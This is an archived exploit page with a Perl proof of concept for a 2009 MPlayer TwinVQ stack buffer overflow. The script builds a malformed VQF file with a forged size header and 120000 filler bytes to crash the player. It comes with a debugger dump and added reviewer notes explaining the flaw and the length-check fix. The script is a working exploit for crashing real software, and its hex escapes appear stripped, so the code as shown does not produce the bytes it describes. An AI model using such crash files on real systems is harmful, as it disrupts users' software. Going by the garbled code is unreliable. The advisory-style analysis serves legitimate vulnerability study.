
mplayertwinvq-overflow.txt

Posted on 16 January 2009

#!/usr/bin/perl
# MPlayer 1.0rc2 TwinVQ Stack Buffer Overflow PoC
# PoC by Amirreza Aminsalehi "sCORPINo"
# (Proud To be an Abay)
# scorpino x40 gmail x2e com
# Snoop Security Researching Committee
# www.snoop-security.com
# Originaly this bug discovered by Tobias Klein
# advisory @ http://trapkit.de/advisories/TKADV2008-014.txt
# Tested on a windows xp sp2 english system and get SIG 11 after openning the PoC with MPlayer ;)
# I did'nt find any document that explain VQF file format, So I reversed that file format to get the headers.
# special tnX to: Shahriyar, Adel, Alireza, Yashar and all snoop members
###########################################################################################
# You Can See Debug dumps here:
#
#(8ec.748): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=0c6257d4 ebx=001f4150 ecx=030fc9f5 edx=00000001 esi=00232fff edi=00215abc
#eip=77c46fa3 esp=001f4120 ebp=001f4128 iopl=0 nv up ei pl nz ac pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:WINDOWSsystem32msvcrt.dll -
#msvcrt!memcpy+0x33:
#77c46fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
#0:000> g
#(8ec.748): Access violation - code c0000005 (!!! second chance !!!)
#eax=0c6257d4 ebx=001f4150 ecx=030fc9f5 edx=00000001 esi=00232fff edi=00215abc
#eip=77c46fa3 esp=001f4120 ebp=001f4128 iopl=0 nv up ei pl nz ac pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200216
#msvcrt!memcpy+0x33:
#77c46fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
###########################################################################################
#
# Reviewer notes (what this script does, as written on this page):
#
# It writes a single crash-test file, amir.vqf, made of the literal prefix
# "TWIN97012000", three header fragments ($head, $head2, $head3) and a run of
# 120000 'A' bytes, then prints a confirmation.  No code is executed in the
# target; the file only exercises the parser.  The debug dump above places the
# fault inside msvcrt!memcpy's "rep movs" loop, i.e. a copy whose length is not
# bounded by the destination -- the classic shape of a length-field-driven
# stack overflow, which is what the advisory title says.  The linked TKADV
# advisory is the authoritative source for affected versions and the fix;
# from a defender's side the lesson is the usual one: a size taken from the
# file header must be checked against the real buffer size before any copy.
#
# NOTE(review): the page extraction appears to have stripped backslashes.
# The string literals below read "x00x01..." -- plain ASCII letters and
# digits -- and the Windows path in the dump has lost its separators the same
# way; presumably the author wrote "\x00\x01..." escapes.  As shown here the
# script therefore produces ASCII text, not the byte values the comments
# describe.  Left byte-for-byte as published.
#
# NOTE(review): no `use strict; use warnings;` -- $head, $head2 and $head3 are
# undeclared package globals, while $file and $FILE are lexicals.
my $file="amir.vqf";
# Two-argument open with the filename interpolated into the mode string:
# harmless here because $file is a fixed literal, but it is the idiom that
# lets mode characters in a filename change what open() does.  The safe form
# is the three-argument open(my $FILE, '>', $file).
open(my $FILE, ">$file") or die "Cannot open $file: $!";
# Author labels this SIZE.  Read as big-endian bytes it is 0x0001D4C0, which
# is decimal 120000 -- exactly the length of the 'A' run written below.
$head = "x00x01xD4xC0"; #SIZE
# Four bytes that decode to the ASCII tag "COMM".
$head2 = "x43x4fx4dx4d"; #COMM
# Remaining header material.  The bytes decode to ASCII sub-chunk tags with
# 4-byte length prefixes (NAME, AUTH, ALBM, TRCK, DATA) followed by short
# text values, e.g. x00x00x00x0b = 11 before the 11-byte NAME value.
$head3 ="x00x00x00x10x00x00x00x01x00x00x00x60x00x00x00x2c".
"x00x00x00x00x4ex41x4dx45x00x00x00x0bx47x69x6cx64".
"x65x64x20x43x61x67x65x41x55x54x48x00x00x00x11x42".
"x6cx61x63x6bx6dx6fx72x65x91x73x20x4ex69x67x68x74".
"x28x63x29x20x00x00x00x04x4ax75x72x61x41x4cx42x4d".
"x00x00x00x0dx53x65x63x72x65x74x20x56x6fx79x61x67".
"x65x54x52x43x4bx00x00x00x02x30x33x44x41x54x41x0c"; # other headers. Not in mood to separate every one ;)
# Magic/version prefix, the three header fragments, then the filler.  The
# author's own comment says the 120000 count was a guess; it happens to match
# the SIZE field above.
print $FILE "TWIN97012000".$head.$head2.$head3. "A" x 120000; #don't pay attention to "A" repeat times.It's just a guess :p
# Return value of close() on a write handle is not checked; buffered write
# errors would go unnoticed (use `close($FILE) or die $!` or `use autodie`).
close($FILE);
# NOTE(review): presumably ended with "\n"; the trailing newline escape looks
# stripped along with the other backslashes.
print "$file has been created ";

 
